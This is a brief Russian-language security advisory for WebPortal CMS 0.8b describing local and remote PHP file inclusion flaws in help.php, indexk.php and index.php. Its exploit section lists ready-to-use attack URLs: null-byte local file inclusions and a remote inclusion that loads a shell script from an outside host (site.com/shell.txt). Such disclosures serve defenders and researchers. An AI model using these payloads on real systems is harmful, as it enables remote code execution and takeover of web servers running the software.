Программа: WebPortal CMS 0.8b

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в различных параметрах сценариями help.php, indexk.php и
index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.

Эксплоит:

http://127.0.0.1/path/webportal-0.8-beta/libraries/helpdocs/help.php?lang=[local
file]%00

http://127.0.0.1/path/webportal-0.8-beta/indexk.php?lib_path=http://site.com/shell.txt?

http://127.0.0.1/path/webportal-0.8-beta/index.php?error=[local file]%00

Оставить мнение